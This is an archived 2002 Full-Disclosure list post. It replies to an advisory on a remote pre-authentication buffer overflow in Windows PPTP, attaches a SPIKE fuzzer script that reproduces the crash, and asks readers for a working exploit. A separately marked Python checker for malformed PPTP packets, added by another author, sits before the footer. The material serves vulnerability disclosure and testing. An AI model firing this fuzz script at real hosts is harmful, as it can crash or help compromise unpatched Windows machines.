List: full-disclosure
Subject: [Full-Disclosure] Re: Microsoft PPTP Server and Client remote vulnerability
From: Dave Aitel <dave () immunitysec ! com>
Date: 2002-09-26 20:13:21
SPIKE 2.6.2 or above should be able to handle this .spk file which will
replicate the vulnerability. Someone send me a working sploit in
exchange, please. I'm too lazy to muck with it. (Or I have other
exploits to muck with, one or the other :>)
-dave
P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy)
at http://www.immunitysec.com/spike.html, if you haven't already.
P.P.S. This script is released under the terms of the GNU GPL v 2.0.
On Thu, 2002-09-26 at 05:43, sh@phion.com wrote:
> phion Security Advisory 26/09/2002
>
> Microsoft PPTP Server and Client remote vulnerability
>
>
> Summary
> -----------------------------
>
> The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
> remotely exploitable pre-authentication buffer overflow.
>
>
> Affected Systems
> -----------------------------
>
> Microsoft Windows 2000 and XP running either a PPTP Server or Client.
>
>
> Impact
> -----------------------------
>
> With a specially crafted PPTP packet it is possible to overwrite kernel
> memory.
>
> A DoS resulting in a lockup of the machine has been verified on
> Windows 2000 SP3 and Windows XP.
>
> A remote compromise should be possible deploying proper shellcode,
> as we were able to fill EDI and EDX with our data.
>
> Clients are vulnerable too, because the Service always listens on port
> 1723 on any interface of the machine; this might be of special concern
> to DSL users who use PPTP to connect to their modem.
>
>
> Solution
> -----------------------------
>
> As a temporary solution for the Client issue, one might firewall the PPTP
> port in the Internet Connection Firewall for Windows XP.
>
> We don't know of any solution for Windows 2000 and Windows XP PPTP servers.
>
> The vendor has been informed.
>
>
> Acknowledgements
> -----------------------------
>
> The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
> on behalf of phion Information Technologies.
>
>
> Contact Information
> -----------------------------
>
> phion Information Technologies can be reached via:
> office@phion.com / http://www.phion.com
>
> Stephan Hoffmann can be reached via:
> sh@phion.com
>
> Thomas Unterleitner can be reached via:
> t.unterleitner@phion.com
>
> References
> -----------------------------
>
> [1] phion Information Technologies
> http://www.phion.com/
>
> Exploit
> -----------------------------
>
> phion Information Technologies will not provide an exploit for this issue.
>
>
> Disclaimer
> -----------------------------
>
> This advisory does not claim to be complete or to be usable for any
> purpose.
>
> This advisory is free for open distribution in unmodified form.
>
> Articles or Publications that are based on information from this advisory
> have to include link [1].
>
>
["pptp.spk" (pptp.spk)]
//start control request
s_block_start("PPTP");
s_binary_block_size_halfword_bigendian("PPTP");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 1 - start control request
//5 is big endian halfword
s_int_variable(0x0001,5);
//reserved
s_binary("0000");
//version 1.0
s_int_variable(0x0100,5);
//reserved
s_binary("0000");
//Framing: Ethernet
s_binary("00000003");
//Bearer: Digital
s_binary("00000002");
//maximum channels
s_binary("ffff");
//firmware revision
s_int_variable(0x0001,5);
//hostname
s_string_variable("A");
s_binary_repeat("00",63);
//vendor
s_string_variable("A");
s_binary_repeat("00",63);
s_block_end("PPTP");
///
/// NEXT PACKET
///
///
//start outgoing call request
s_block_start("PPTP2");
s_binary_block_size_halfword_bigendian("PPTP2");
//message type 1 - control request
s_int_variable(0x0001,5);
//cookie
s_binary("1a 2b 3c 4d");
//type 7 - outgoing call request
//5 is big endian halfword
s_int_variable(0x0007,5);
//reserved
s_binary("0000");
//call id
s_binary("0000");
//serial number
s_binary("0000");
//min bps
s_binary("00000960");
//max bps
s_binary("00989680");
//bearer capabilities
s_binary("00000002");
//framing
s_binary("00000003");
//receive window size
s_binary("0003");
//processing delay
s_binary("0000");
s_binary_block_size_halfword_bigendian("PHONENUMBER");
//reserved
s_binary("0000");
s_block_start("PHONENUMBER");
s_string_variable("");
s_block_end("PHONENUMBER");
//subaddress
s_string_variable("");
s_block_end("PPTP2");
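For anyone monitoring port 1723 for the kind of traffic the .spk above generates, here is an added example (my own, not part of Dave's post, SPIKE, or the phion advisory): a Python checker that parses the RFC 2637 control-message header and flags an Outgoing-Call-Request whose declared length, fixed 168-byte size, or phone-number length field is inconsistent, which is exactly what the fuzzed PHONENUMBER block produces. The build_ocrq helper and its sample values are constructed for the demonstration; the advisory does not say which field triggers the overflow, so this is a structural sanity check rather than a signature for the bug.

```python
import struct

PPTP_MAGIC = 0x1A2B3C4D
SCCRQ, OCRQ = 1, 7                       # control message types emitted by pptp.spk
FIXED_LEN = {SCCRQ: 156, OCRQ: 168}      # fixed on-the-wire sizes per RFC 2637


def check_pptp_control(pkt):
    """Return a list of findings for one PPTP control message; [] means well-formed."""
    if len(pkt) < 12:
        return ["truncated: header needs 12 bytes, got %d" % len(pkt)]
    # Length, PPTP Message Type, Magic Cookie, Control Message Type, Reserved0
    length, msg_type, magic, ctrl_type, _res = struct.unpack(">HHIHH", pkt[:12])
    findings = []
    if magic != PPTP_MAGIC:
        findings.append("bad magic cookie 0x%08x" % magic)
    if msg_type != 1:
        findings.append("PPTP message type %d is not a control message" % msg_type)
    if length != len(pkt):
        findings.append("declared length %d != actual %d" % (length, len(pkt)))
    expected = FIXED_LEN.get(ctrl_type)
    if expected is not None and len(pkt) != expected:
        findings.append("control type %d must be %d bytes, got %d"
                        % (ctrl_type, expected, len(pkt)))
    if ctrl_type == OCRQ and len(pkt) >= 38:
        # Phone Number Length sits at offset 36; the field it describes is 64 bytes
        phone_len = struct.unpack(">H", pkt[36:38])[0]
        if phone_len > 64:
            findings.append("phone number length %d exceeds 64-byte field" % phone_len)
    return findings


def build_ocrq(phone=b"", subaddr=b"", phone_len=None, pad=True):
    """Constructed Outgoing-Call-Request in the field order used by pptp.spk.

    pad=False mimics the .spk, which sends unpadded variable strings for the
    phone number and subaddress instead of the two 64-byte fields."""
    if pad:
        phone, subaddr = phone.ljust(64, b"\0"), subaddr.ljust(64, b"\0")
    if phone_len is None:
        phone_len = len(phone.rstrip(b"\0"))
    # ctrl type, reserved0, call id, serial, min bps, max bps, bearer, framing,
    # recv window, processing delay, phone number length, reserved1
    body = struct.pack(">HHHHIIIIHHHH", OCRQ, 0, 0, 0, 2400, 10000000, 2, 3,
                       3, 0, phone_len, 0) + phone + subaddr
    return struct.pack(">HHI", 8 + len(body), 1, PPTP_MAGIC) + body
```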
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html